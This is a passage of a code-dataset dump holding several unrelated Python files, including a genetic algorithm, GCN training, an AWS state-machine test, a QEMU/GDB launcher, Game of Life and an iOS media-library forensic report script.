parent3.x[j]\r\n for j in range(20):\r\n if random.random() < Pm:\r\n parent1.x[j] = (parent1.x[j] + 1) % 2\r\n if random.random() < Pm:\r\n parent2.x[j] = (parent2.x[j] + 1) % 2\r\n\r\n parent1.fitness = Cal_fit(parent1.x, upper, lower)\r\n parent2.fitness = Cal_fit(parent2.x, upper, lower)\r\n Gchild[2 * i] = copy.deepcopy(parent1)\r\n Gchild[2 * i + 1] = copy.deepcopy(parent2)\r\n\r\ndef Choose_next(G, Gchild, Gsum, Pop): #选择下一代函数\r\n for i in range(Pop):\r\n Gsum[i] = copy.deepcopy(G[i])\r\n Gsum[2 * i + 1] = copy.deepcopy(Gchild[i])\r\n Gsum = sorted(Gsum, key = lambda x: x.fitness, reverse = True)\r\n for i in range(Pop):\r\n G[i] = copy.deepcopy(Gsum[i])\r\n G[i].place = i\r\n\r\ndef Decode(x): #解码函数\r\n Temp1 = 0\r\n for i in range(10):\r\n Temp1 += x[i] * math.pow(2, i)\r\n Temp2 = 0\r\n for i in range(10, 20, 1):\r\n Temp2 += math.pow(2, i - 10) * x[i]\r\n x1 = lower[0] + Temp1 * (upper[0] - lower[0]) / (math.pow(2, 10) - 1)\r\n x2 = lower[1] + Temp2 * (upper[1] - lower[1]) / (math.pow(2, 10) - 1)\r\n if x1 > upper[0]:\r\n x1 = random.uniform(lower[0], upper[0])\r\n if x2 > upper[1]:\r\n x2 = random.uniform(lower[1], upper[1])\r\n return x1, x2\r\n\r\ndef Self_Learn(Best, upper, lower, sPm, sLearn): #自学习操作\r\n num = 0\r\n Temp = copy.deepcopy(Best)\r\n while True:\r\n num += 1\r\n for j in range(20):\r\n if random.random() < sPm:\r\n Temp.x[j] = (Temp.x[j] + 1)%2\r\n Temp.fitness = Cal_fit(Temp.x, upper, lower)\r\n if Temp.fitness > Best.fitness:\r\n Best = copy.deepcopy(Temp)\r\n num = 0\r\n if num > sLearn:\r\n break\r\n return Best\r\n\r\nif __name__ == '__main__':\r\n upper = [5,5]\r\n lower = [-5,-5]\r\n Pop = 100\r\n Ppool = 50\r\n G_max = 300\r\n Pc = 0.9\r\n Pm = 0.15\r\n sPm = 0.05\r\n sLearn = 20\r\n G = np.array([Ind() for _ in range(Pop)])\r\n Gparent = np.array([Ind() for _ in range(Ppool)])\r\n Gchild = np.array([Ind() for _ in range(Pop)])\r\n Gsum = np.array([Ind() for _ in range(Pop * 2)])\r\n Init(G, upper, lower, Pop) #初始化\r\n Best = Find_Best(G, Pop)\r\n Y=[]\r\n for k in range(G_max):\r\n Selection(G, Gparent, Pop, Ppool) #使用轮盘赌方法选择其中50%为父代\r\n Cross_and_Mutation(Gparent, Gchild, Pc, Pm, upper, lower, Pop, Ppool) #交叉和变异生成子代\r\n Choose_next(G, Gchild, Gsum, Pop) #选择出父代和子代中较优秀的个体\r\n Cbest = Find_Best(G, Pop)\r\n if Best.fitness < Cbest.fitness:\r\n Best = copy.deepcopy(Cbest) #跟新最优解\r\n else:\r\n G[Cbest.place] = copy.deepcopy(Best)\r\n Best = Self_Learn(Best, upper, lower, sPm, sLearn)\r\n Y.append(Best.fitness)\r\n print(Best.fitness)\r\n x1, x2 = Decode(Best.x)\r\n print(Best.x)\r\n print([x1, x2])\r\n X=[]\r\n for i in range(300):\r\n X.append(i)\r\n plt.plot(X,Y)\r\n plt.show()","sub_path":"Test_Function/GA.function3.py","file_name":"GA.function3.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"23817231","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport numpy as np\n\nimport torch\nimport torch.optim as optim\nfrom model import GCN\nimport torch.nn.functional as F\nimport time\nfrom utils import load_data, accuracy\nfrom operator import itemgetter\n\n# Training settings\nparser = argparse.ArgumentParser()\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='Disables CUDA training.')\nparser.add_argument('--fastmode', action='store_true', default=False,\n help='Validate during training pass.')\nparser.add_argument('--seed', type=int, default=42, help='Random seed.')\nparser.add_argument('--epochs', type=int, default=200,\n help='Number of epochs to train.')\nparser.add_argument('--lr', type=float, default=0.01,\n help='Initial learning rate.')\nparser.add_argument('--weight_decay', type=float, default=5e-4,\n help='Weight decay (L2 loss on parameters).')\nparser.add_argument('--hidden', type=int, default=148,\n help='Number of hidden units.')\nparser.add_argument('--dropout', type=float, default=0.5,\n help='Dropout rate (1 - keep probability).')\n\nargs = parser.parse_args()\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\n\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nif args.cuda:\n torch.cuda.manual_seed(args.seed)\n\n# Load data\nadj, features, labels, train_idx, test_idx = load_data()\n\n# Model and optimizer\nmodel = GCN(nfeat=148,\n nhid=args.hidden,\n nclass=3,\n dropout=args.dropout)\noptimizer = optim.Adam(model.parameters(),\n lr=args.lr, weight_decay=args.weight_decay)\n\nif args.cuda:\n model.cuda()\n for i in range(len(features)):\n features[i] = features[i].cuda()\n adj[i] = adj[i].cuda()\n labels[i] = labels[i].cuda()\n\n\ndef train(epoch, train_idx):\n t = time.time()\n model.train()\n optimizer.zero_grad()\n\n loss = torch.FloatTensor([0]).cuda()\n out_list = []\n for i in train_idx:\n x = features[i]\n a = adj[i]\n dx = labels[i]\n output = model(x, a)\n out_list.append(output)\n loss.add_(F.nll_loss(output, dx))\n\n acc_train = accuracy(out_list, itemgetter(*train_idx)(labels))\n if epoch%10 == 0:\n print(\"Train Accuracy\", acc_train)\n loss.backward()\n optimizer.step()\n # print('loss: {}'.format(loss.data))\n\n # if not args.fastmode:\n # # Evaluate validation set performance separately,\n # # deactivates dropout during validation run.\n # model.eval()\n # output = model(features, adj)\n\n # loss_val = F.nll_loss(output[idx_val], labels[idx_val])\n # acc_val = accuracy(output[idx_val], labels[idx_val])\n # print('Epoch: {:04d}'.format(epoch+1),\n # 'loss_train: {:.4f}'.format(loss_train.item()),\n # 'acc_train: {:.4f}'.format(acc_train.item()),\n # 'loss_val: {:.4f}'.format(loss_val.item()),\n # 'acc_val: {:.4f}'.format(acc_val.item()),\n # 'time: {:.4f}s'.format(time.time() - t))\n\n\ndef test(idx_test):\n model.eval()\n output = []\n for i in idx_test:\n output.append(model(features[i], adj[i]))\n\n acc_test = accuracy(output, itemgetter(*idx_test)(labels))\n print(\"Test set results:\",\n \"accuracy= {:.4f}\".format(acc_test.item()))\n\n\n# Train model\nt_total = time.time()\nfor i in range(0, len(test_idx)):\n for epoch in range(args.epochs):\n train(epoch, train_idx[i])\n test(test_idx[i])\nprint(\"Optimization Finished!\")\nprint(\"Total time elapsed: {:.4f}s\".format(time.time() - t_total))","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"322586339","text":"import json\nimport logging\nimport os\nfrom time import sleep\nfrom typing import Dict\nfrom unittest import TestCase\nfrom uuid import uuid4\n\nimport boto3\nfrom botocore.client import BaseClient\n\n\"\"\"\nMake sure env variable AWS_SAM_STACK_NAME exists with the name of the stack we are going to test. \n\"\"\"\n\nclass TestStateMachine(TestCase):\n \"\"\"\n This integration test will execute the step function and verify that State Machine can process a mock Glue job execution.\n \"\"\"\n\n state_machine_arn: str\n client: BaseClient\n\n @classmethod\n def get_and_verify_stack_name(cls) -> str:\n stack_name = os.environ.get(\"AWS_SAM_STACK_NAME\")\n if not stack_name:\n raise Exception(\n \"Cannot find env var AWS_SAM_STACK_NAME. \\n\"\n \"Please setup this environment variable with the stack name where we are running integration tests.\"\n )\n\n # Verify stack exists\n client = boto3.client(\"cloudformation\")\n try:\n client.describe_stacks(StackName=stack_name)\n except Exception as e:\n raise Exception(\n f\"Cannot find stack {stack_name}. \\n\" f'Please make sure stack with the name \"{stack_name}\" exists.'\n ) from e\n\n return stack_name\n\n @classmethod\n def setUpClass(cls) -> None:\n \"\"\"\n Based on the provided env variable AWS_SAM_STACK_NAME,\n here we use cloudformation API to find out:\n - StateMachine's ARN\n \"\"\"\n stack_name = TestStateMachine.get_and_verify_stack_name()\n\n client = boto3.client(\"cloudformation\")\n response = client.list_stack_resources(StackName=stack_name)\n resources = response[\"StackResourceSummaries\"]\n state_machine_resources = [\n resource for resource in resources if resource[\"LogicalResourceId\"] == \"StateMachine\"\n ]\n if not state_machine_resources:\n raise Exception(\"Cannot find StateMachine\")\n\n cls.state_machine_arn = state_machine_resources[0][\"PhysicalResourceId\"]\n\n def setUp(self) -> None:\n self.client = boto3.client(\"stepfunctions\")\n\n def tearDown(self) -> None:\n \"\"\"\n Delete appropriate resources as necessary\n \"\"\"\n pass\n\n def _start_execute(self) -> str:\n \"\"\"\n Start the state machine execution request and record the execution ARN\n \"\"\"\n response = self.client.start_execution(\n stateMachineArn=self.state_machine_arn, name=f\"integ-test-{uuid4()}\", input=\"{}\"\n )\n return response[\"executionArn\"]\n\n def _wait_execution(self, execution_arn: str):\n while True:\n response = self.client.describe_execution(executionArn=execution_arn)\n status = response[\"status\"]\n if status == \"SUCCEEDED\":\n logging.info(f\"Execution {execution_arn} completely successfully.\")\n break\n elif status == \"RUNNING\":\n logging.info(f\"Execution {execution_arn} is still running, waiting\")\n sleep(3)\n else:\n self.fail(f\"Execution {execution_arn} failed with status {status}\")\n\n def test_state_machine(self):\n execution_arn = self._start_execute()\n self._wait_execution(execution_arn)\n response = self.client.describe_execution(\n executionArn=execution_arn\n )\n output = json.loads(response[\"output\"])\n assert output[\"message\"] == \"successful glue job execution\"\n","sub_path":"python3.9/step-func-etl/{{cookiecutter.project_name}}/tests/integration/test_state_machine.py","file_name":"test_state_machine.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"578954225","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pycupid', '0007_auto_20160516_1758'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='people',\n name='img_loc',\n field=models.URLField(default='https://res.cloudinary.com/hiwpdsflr/image/upload/v1463435086/jfo4xgixtukhkzhbuymt.jpg'),\n ),\n migrations.AlterField(\n model_name='people',\n name='ukey',\n field=models.UUIDField(help_text='The unique id we use to differentiate users in links in the welcome email.', editable=False, null=True, default='c9ccfebbf5e0426ba9edd32ce2866ff7'),\n ),\n ]\n","sub_path":"apps/pycupid/migrations/0008_auto_20160516_1801.py","file_name":"0008_auto_20160516_1801.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"388079096","text":"import itertools\nimport os\nimport shlex\nimport shutil\nimport signal\nimport subprocess\nimport time\nimport os\n\nFIRST_UID = 1000\n\n\n# Reserve 10 ports for each user starting from 24000\ndef gdb_port():\n return 24000 + (os.getuid() - FIRST_UID) * 10\n\n\ndef uart_port(num):\n assert num >= 0 and num < 9\n return gdb_port() + 1 + num\n\n\nCONFIG = {\n 'board': 'malta',\n 'config': {\n 'debug': False,\n 'graphics': False,\n 'elf': 'sys/mimiker.elf',\n 'initrd': 'initrd.cpio',\n 'args': [],\n 'board': {\n 'malta': {\n 'kernel': 'sys/mimiker.elf',\n },\n 'rpi3': {\n 'kernel': 'sys/mimiker.img.gz',\n },\n },\n },\n 'qemu': {\n 'options': [\n '-nodefaults',\n '-icount', 'shift=3,sleep=on',\n '-kernel', '{kernel}',\n '-initrd', '{initrd}',\n '-gdb', 'tcp:127.0.0.1:{},server,wait'.format(gdb_port()),\n '-serial', 'none'],\n 'board': {\n 'malta': {\n 'binary': 'qemu-mimiker-mipsel',\n 'options': [\n '-device', 'VGA',\n '-device', 'rtl8139',\n '-machine', 'malta',\n '-cpu', '24Kf'],\n 'uarts': [\n dict(name='/dev/tty1', port=uart_port(0), raw=True),\n dict(name='/dev/tty2', port=uart_port(1)),\n dict(name='/dev/cons', port=uart_port(2))\n ]\n },\n 'rpi3': {\n 'binary': 'qemu-mimiker-aarch64',\n 'options': [\n '-machine', 'raspi3',\n '-smp', '4',\n '-cpu', 'cortex-a53'],\n 'uarts': [\n dict(name='/dev/cons', port=uart_port(0))\n ]\n }\n }\n },\n 'gdb': {\n 'pre-options': [\n '-n',\n '-ex=set confirm no',\n '-iex=set auto-load safe-path {}/'.format(os.getcwd()),\n '-ex=set tcp connect-timeout 30',\n '-ex=target remote localhost:{}'.format(gdb_port()),\n '--silent',\n ],\n 'extra-options': [],\n 'post-options': [\n '-ex=set confirm yes',\n '-ex=source .gdbinit',\n '-ex=continue',\n '{elf}'\n ],\n 'board': {\n 'malta': {\n 'binary': 'mipsel-mimiker-elf-gdb'\n },\n 'rpi3': {\n 'binary': 'aarch64-mimiker-elf-gdb'\n }\n }\n }\n}\n\n\ndef setboard(name):\n setvar('board', name)\n # go over top-level configuration variables\n for top, config in CONFIG.items():\n if type(config) is not dict:\n continue\n board = getvar('board.' + name, start=config, failok=True)\n if not board:\n continue\n # merge board variables into generic set\n for key, value in board.items():\n if key not in config:\n config[key] = value\n elif type(value) == list:\n config[key].extend(value)\n else:\n raise RuntimeError(f'Cannot merge {top}.board.{name}.{key} '\n f'into {top}')\n # finish merging by removing alternative configurations\n del config['board']\n\n\ndef getvar(name, start=CONFIG, failok=False):\n value = start\n for f in name.split('.'):\n try:\n value = value[f]\n except KeyError as ex:\n if failok:\n return None\n raise ex\n return value\n\n\ndef setvar(name, val, config=CONFIG):\n fs = name.split('.')\n while len(fs) > 1:\n config = config[fs.pop(0)]\n config[fs.pop(0)] = val\n\n\ndef getopts(*names):\n opts = itertools.chain.from_iterable([getvar(name) for name in names])\n return [opt.format(**getvar('config')) for opt in opts]\n\n\nclass Launchable():\n def __init__(self, name, cmd):\n self.name = name\n self.cmd = cmd\n self.window = None\n self.process = None\n self.pid = None\n self.options = []\n\n def start(self, session):\n cmd = ' '.join([self.cmd] + list(map(shlex.quote, self.options)))\n self.window = session.new_window(\n attach=False, window_name=self.name, window_shell=cmd)\n self.pid = int(self.window.attached_pane._info['pane_pid'])\n\n def run(self):\n self.process = subprocess.Popen([self.cmd] + self.options,\n start_new_session=False)\n\n # Returns true iff the process terminated\n def wait(self, timeout=None):\n if self.process is None:\n return False\n # Throws exception on timeout\n self.process.wait(timeout)\n self.process = None\n return True\n\n def stop(self):\n if self.process is not None:\n try:\n # Give it a chance to exit gracefuly.\n self.process.send_signal(signal.SIGTERM)\n try:\n self.process.wait(0.2)\n except subprocess.TimeoutExpired:\n self.process.send_signal(signal.SIGKILL)\n except ProcessLookupError:\n # Process already quit.\n pass\n self.process = None\n\n if self.pid is not None:\n time.sleep(0.2)\n try:\n os.kill(self.pid, signal.SIGKILL)\n except ProcessLookupError:\n # Process has already quit!\n pass\n self.pid = None\n\n def interrupt(self):\n if self.process is not None:\n self.process.send_signal(signal.SIGINT)\n\n @staticmethod\n def wait_any(launchables):\n for l in itertools.cycle(launchables):\n try:\n if l.wait(0.2):\n break\n except subprocess.TimeoutExpired:\n continue\n\n\nclass QEMU(Launchable):\n def __init__(self):\n super().__init__('qemu', getvar('qemu.binary'))\n\n self.options = getopts('qemu.options')\n for uart in getvar('qemu.uarts'):\n port = uart['port']\n self.options += ['-serial', f'tcp:127.0.0.1:{port},server,wait']\n\n if getvar('config.args'):\n self.options += ['-append', ' '.join(getvar('config.args'))]\n if getvar('config.debug'):\n self.options += ['-S']\n if not getvar('config.graphics'):\n self.options += ['-display', 'none']\n\n\nclass GDB(Launchable):\n def __init__(self, name=None, cmd=None):\n super().__init__(name or 'gdb', cmd or getvar('gdb.binary'))\n # gdbtui & cgdb output is garbled if there is no delay\n self.cmd = 'sleep 0.25 && ' + self.cmd\n\n if self.name == 'gdb':\n self.options += ['-ex=set prompt \\033[35;1m(gdb) \\033[0m']\n self.options += getopts(\n 'gdb.pre-options', 'gdb.extra-options', 'gdb.post-options')\n\n\nclass GDBTUI(GDB):\n def __init__(self):\n super().__init__('gdbtui')\n self.options = ['-tui']\n\n\nclass CGDB(GDB):\n def __init__(self):\n super().__init__('cgdb', 'cgdb')\n self.options = ['-d', getvar('gdb.binary')]\n\n\nclass SOCAT(Launchable):\n def __init__(self, name, tcp_port, raw=False):\n super().__init__(name, 'socat')\n # The simulator will only open the server after some time has\n # passed. To minimize the delay, keep reconnecting until success.\n stdio_opt = 'STDIO'\n if raw:\n stdio_opt += ',cfmakeraw'\n self.options = [stdio_opt, f'tcp:localhost:{tcp_port},retry,forever']\n\n\nDebuggers = {'gdb': GDB, 'gdbtui': GDBTUI, 'cgdb': CGDB}\n__all__ = ['Launchable', 'QEMU', 'GDB', 'CGDB', 'GDBTUI', 'SOCAT', 'Debuggers',\n 'gdb_port', 'uart_port', 'getvar', 'setvar', 'setboard']\n","sub_path":"launcher/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"212227989","text":"#!/usr/bin/python\r\n\r\n\r\nimport numpy\r\nimport sys\r\n\r\nimport cv2.cv as cv\r\n\r\n\r\ndef game_of_life():\r\n \"\"\"Capture images with a webcam, binarize them\r\n and run Conways game of life on it.\"\"\"\r\n if len(sys.argv) == 1:\r\n capture = cv.CreateCameraCapture(0)\r\n elif len(sys.argv) == 2 and sys.argv[1].isdigit():\r\n capture = cv.CreateCameraCapture(int(sys.argv[1]))\r\n elif len(sys.argv) == 2:\r\n capture = cv.CreateFileCapture(sys.argv[1])\r\n\r\n if not capture:\r\n sys.exit(\"Can not initialize capturing...\")\r\n\r\n capture_window_name = \"Hit any key to snap or escape to quit.\";\r\n binary_window_name = \"binary\";\r\n snap_window_name = \"snap\";\r\n gol_window_name = \"GoL\";\r\n cv.NamedWindow(capture_window_name, 1)\r\n\r\n source_frame = None\r\n gol_frame = None\r\n binary_frame = None\r\n gol_kernel = cv.CreateMat(3, 3, cv.CV_8UC1)\r\n for y in range(0, 3):\r\n for x in range(0, 3):\r\n gol_kernel[y, x] = 1\r\n gol_kernel[1, 1] = 9\r\n\r\n gol_lut = cv.CreateMat(256, 1, cv.CV_8UC1)\r\n for c in range(0,255):\r\n gol_lut[c, 0] = 0\r\n\r\n # Classical rules of Convay implemented as filter\r\n gol_lut[ 3, 0] = 255\r\n gol_lut[11, 0] = 255\r\n gol_lut[12, 0] = 255\r\n\r\n while True:\r\n captured_frame = cv.QueryFrame(capture)\r\n if captured_frame:\r\n destWidth = 320\r\n destHeight = 240\r\n# destWidth = 1920\r\n# destHeight = 1080\r\n frame = cv.CreateMat(destHeight, destWidth, cv.CV_8UC3)\r\n cv.Resize(captured_frame, frame, cv.CV_INTER_AREA)\r\n cv.ShowImage(capture_window_name, frame)\r\n binary_frame = cv.CreateImage(cv.GetSize(frame), cv.IPL_DEPTH_8U, 1)\r\n cv.CvtColor(frame, binary_frame, cv.CV_RGB2GRAY)\r\n image1 = cv.fromarray(numpy.ones((destHeight, destWidth, 1)))\r\n cv.AdaptiveThreshold(binary_frame, binary_frame, 1)\r\n cv.Sub(image1, binary_frame, binary_frame)\r\n cv.Threshold(binary_frame, binary_frame, 0, 255, cv.CV_THRESH_BINARY)\r\n cv.ShowImage(binary_window_name, binary_frame)\r\n\r\n key = cv.WaitKey(1);\r\n if key == 1048603 or key == 27: # Escape?\r\n break;\r\n elif key != -1:\r\n frameNum = 0;\r\n cv.SaveImage('GameOfLifeFrame.png', frame)\r\n cv.SaveImage('GameOfLifeBinaryFrame.png', binary_frame)\r\n source_frame = binary_frame;\r\n cv.ShowImage(snap_window_name, source_frame)\r\n gol_frame = source_frame\r\n\r\n if gol_frame:\r\n old_gol_frame = gol_frame\r\n cv.Threshold(gol_frame, gol_frame, 0, 1, cv.CV_THRESH_BINARY)\r\n cv.Filter2D(old_gol_frame, gol_frame, gol_kernel)\r\n cv.LUT(gol_frame, gol_frame, gol_lut)\r\n# cv.SaveImage('output/'+str(frameNum)+'.png', gol_frame)\r\n frameNum+=1\r\n cv.ShowImage(gol_window_name, gol_frame)\r\n\r\n cv.DestroyWindow(capture_window_name)\r\n cv.DestroyWindow(binary_window_name)\r\n cv.DestroyWindow(snap_window_name)\r\n cv.DestroyWindow(gol_window_name)\r\n\r\nif __name__ == \"__main__\":\r\n exit(game_of_life())","sub_path":"game_of_life.py","file_name":"game_of_life.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"570868962","text":"import numpy as np\n\n\ndef query_next_top1(s, queried):\n s_copy = np.array([-np.inf if i in queried else val for i, val in enumerate(s)])\n u = np.argmax(s_copy)\n return u\n\n\ndef sample(scores, size, inv=False, c=-0.99):\n arr = np.arange(len(scores))\n probs = 1. / np.array(scores) if inv else np.array(scores)\n\n #ids = np.argsort(probs)[:len(probs) // 2]\n #probs[ids] = 0\n\n probs = probs / np.sum(probs)\n if not inv: probs = (c * probs + 1) ** (1 / c)\n\n probs = probs / np.sum(probs)\n probs[probs < 0] = 0 # quick hack to avoid some decimal precision problems\n probs = probs / np.sum(probs)\n\n return np.random.choice(arr, size=size, replace=False, p=probs)\n\n\ndef sigmoid(a, b):\n return 1 / (1 + np.exp(-(a - b)))\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"600637685","text":"import unittest\nimport sys\n\nundertest = __import__(sys.argv[-1].split(\".py\")[0])\nuniao_listas = getattr(undertest, 'uniao_listas', None)\n\nclass PublicTests(unittest.TestCase):\n\n def test_exemplo(self):\n l1 = [2,1,3,4]\n l2 = [2]\n assert uniao_listas(l1,l2) == None\n assert l1 == [2,1,3,4]\n assert l2 == [2]\n\n l1 = [1,3,4]\n l2 = [4]\n assert uniao_listas(l1,l2) == None\n assert l1 == [1,3,4]\n assert l2 == [4]\n\n l1 = [2,4,1]\n l2 = [6,7,91]\n uniao_listas(l1,l2)\n assert l1 == [2,4,1,6,7,91]\n assert l2 == [6,7,91]\n \n\nif __name__ == '__main__':\n loader = unittest.TestLoader()\n runner = unittest.TextTestRunner()\n runner.run(loader.loadTestsFromModule(sys.modules[__name__]))\n","sub_path":"Unidade 8/uniao/public_tests.py","file_name":"public_tests.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"52447685","text":"#!/usr/bin/python3.4\n# -*- coding: utf-8 -*-\n\n\"\"\"\nIt was proposed by Christian Goldbach that every odd composite number can be\nwritten as the sum of a prime and twice a square.\n\n9 = 7 + 2×1^2\n15 = 7 + 2×2^2\n21 = 3 + 2×3^2\n25 = 7 + 2×3^2\n27 = 19 + 2×2^2\n33 = 31 + 2×1^2\n\nIt turns out that the conjecture was false.\n\nWhat is the smallest odd composite that cannot be written as the sum of a prime\nand twice a square?\n\"\"\"\n\n\nimport math\nimport sys\n\ndef is_prime(number):\n \"\"\"\n A slow prime checker function\n \"\"\"\n\n number = abs(number)\n\n if number == 1:\n return False\n\n # For faster processment\n # All primes except 2 are odd\n if number % 2 == 0 and number != 2:\n return False\n\n if number % 3 == 0 and number != 3:\n return False\n\n # Only up to the square root\n for n in range(2, math.trunc(math.sqrt(number)) + 1):\n if number % n == 0:\n return False\n\n return True\n\nif __name__ == \"__main__\":\n\n counter = 2\n search = True\n primes = set()\n\n while search:\n\n p = False\n if is_prime(counter):\n p = True\n primes.add(counter)\n\n if counter % 2 != 0 and p is False:\n print(counter)\n sys.stdout.flush()\n\n check_composite = False\n\n for prime in primes:\n res = 1\n while prime + (2 * math.pow(res, 2)) <= counter:\n\n if prime + (2 * math.pow(res, 2)) == counter:\n check_composite = True\n\n res += 1\n\n if check_composite is False:\n sys.exit()\n break\n\n\n counter += 1\n","sub_path":"id46.py","file_name":"id46.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"286135692","text":"import glob\nimport os\nimport pathlib\nimport plistlib\nimport sqlite3\n\nfrom common import logfunc\nfrom contrib.utils import silence_and_log\nfrom settings import *\nfrom vendor import ccl_bplist\n\n\ndef medlib(filefound):\n try:\n db = sqlite3.connect(filefound[0])\n cursor = db.cursor()\n cursor.execute(\n \"\"\"\n\t\tselect\n\t\text.title AS \"Title\",\n\t\text.media_kind AS \"Media Type\",\n\t\titep.format AS \"File format\",\n\t\text.location AS \"File\",\n\t\text.total_time_ms AS \"Total time (ms)\",\n\t\text.file_size AS \"File size\",\n\t\text.year AS \"Year\",\n\t\talb.album AS \"Album Name\",\n\t\talba.album_artist AS \"Artist\", \n\t\tcom.composer AS \"Composer\", \n\t\tgen.genre AS \"Genre\",\n\t\tart.artwork_token AS \"Artwork\",\n\t\titev.extended_content_rating AS \"Content rating\",\n\t\titev.movie_info AS \"Movie information\",\n\t\text.description_long AS \"Description\",\n\t\tite.track_number AS \"Track number\",\n\t\tsto.account_id AS \"Account ID\",\n\t\tstrftime('%d/%m/%Y %H:%M:%S', datetime(sto.date_purchased + 978397200,'unixepoch'))date_purchased,\n\t\tsto.store_item_id AS \"Item ID\",\n\t\tsto.purchase_history_id AS \"Purchase History ID\",\n\t\text.copyright AS \"Copyright\"\n\t\tfrom\n\t\titem_extra ext\n\t\tjoin item_store sto using (item_pid)\n\t\tjoin item ite using (item_pid)\n\t\tjoin item_stats ites using (item_pid)\n\t\tjoin item_playback itep using (item_pid)\n\t\tjoin item_video itev using (item_pid)\n\t\tleft join album alb on sto.item_pid=alb.representative_item_pid\n\t\tleft join album_artist alba on sto.item_pid=alba.representative_item_pid\n\t\tleft join composer com on sto.item_pid=com.representative_item_pid\n\t\tleft join genre gen on sto.item_pid=gen.representative_item_pid\n\t\tleft join item_artist itea on sto.item_pid=itea.representative_item_pid\n\t\tleft join artwork_token art on sto.item_pid=art.entity_pid \n\t\t\"\"\"\n )\n\n all_rows = cursor.fetchall()\n usageentries = len(all_rows)\n if usageentries > 0:\n logfunc(f\"Media Library function executing\")\n os.makedirs(os.path.join(reportfolderbase, \"Media Library/\"))\n with open(\n os.path.join(reportfolderbase, \"Media Library/Media Library.html\"),\n \"w\",\n encoding=\"utf8\",\n ) as f:\n f.write(\"\")\n f.write(\"

Media Library report

\")\n f.write(f\"Media Library entries: {usageentries}
\")\n f.write(f\"Media Library located at: {filefound[0]}
\")\n f.write(\n \"\"\n )\n f.write(\"
\")\n f.write(\"\")\n f.write(f'
')\n f.write(\n f\"\"\n )\n for row in all_rows:\n f.write(\n f\"\"\n )\n f.write(f\"
TitleMedia TypeFile FormatFileTotal Time (ms)File SizeYearAlbum NameArtistComposerGenreArtworkContent RatingMovie InformationDescriptionTrack NumberAccount IDDate PurchasedItem IDPurchase History IDCopyright
{row[0]}{row[1]}{row[2]}{row[3]}{row[4]}{row[5]}{row[6]}{row[7]}{row[8]}{row[9]}{row[10]}{row[11]}{row[12]}{row[13]}{row[14]}{row[15]}{row[16]}{row[17]}{row[18]}{row[19]}{row[20]}
\")\n logfunc(f\"Media Library function completed\")\n else:\n logfunc(\"No Media Library available\")\n except:\n logfunc(\"Error in Media Library Section.\")\n","sub_path":"contrib/media_library/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"121981029","text":"import pygame\r\nfrom params import *\r\n\r\ndef Keyboard(key, mapParameters, carsParameters):\r\n pressingArray = pygame.key.get_pressed()\r\n # print(pressingArray[KEY_D])\r\n pos = mapParameters[1]\r\n if key == pygame.K_z:\r\n mapParameters[0] = 2\r\n elif key == pygame.K_x:\r\n mapParameters[0] = 1\r\n mapParameters[1] = (0,0)\r\n\r\n if key == pygame.K_F1:\r\n mapParameters[2] = True\r\n\r\n if (key == pygame.K_d or pressingArray[KEY_D]) and mapParameters[0] == 2 :\r\n mapParameters[1] = limitPosition(pos, (-100, 0))\r\n elif (key == pygame.K_a or pressingArray[KEY_A]) and mapParameters[0] == 2:\r\n mapParameters[1] = limitPosition(pos, (100, 0))\r\n\r\n if (key == pygame.K_w or pressingArray[KEY_W]) and mapParameters[0] == 2:\r\n mapParameters[1] = limitPosition(pos, (0, 100))\r\n elif (key == pygame.K_s or pressingArray[KEY_S]) and mapParameters[0] == 2:\r\n mapParameters[1] = limitPosition(pos, (0, -100))\r\n\r\n if key == pygame.K_UP or pressingArray[KEY_UP]:\r\n carsParameters.append(\"up\")\r\n elif key == pygame.K_DOWN or pressingArray[KEY_DOWN]:\r\n carsParameters.append(\"down\")\r\n\r\n if key == pygame.K_LEFT or pressingArray[KEY_LEFT]:\r\n carsParameters.append(\"left\")\r\n elif key == pygame.K_RIGHT or pressingArray[KEY_RIGHT]:\r\n carsParameters.append(\"right\")\r\n \r\n # print(pressingArray[KEY_UP])\r\n\r\n\r\n \r\n return mapParameters, carsParameters\r\n\r\n\r\ndef limitPosition(pos, increse):\r\n position = [pos[0], pos[1]] \r\n if pos[0] + increse[0] < -SCREEN_WIDTH:\r\n position[0] = -SCREEN_WIDTH\r\n elif pos[0] + increse[0] > 0:\r\n position[0] = 0\r\n else:\r\n position[0] = pos[0] + increse[0]\r\n\r\n if pos[1] + increse[1] < -SCREEN_HEIGHT:\r\n position[1] = -SCREEN_HEIGHT\r\n elif pos[1] + increse[1] > 0:\r\n position[1] = 0\r\n else:\r\n position[1] = pos[1] + increse[1]\r\n return 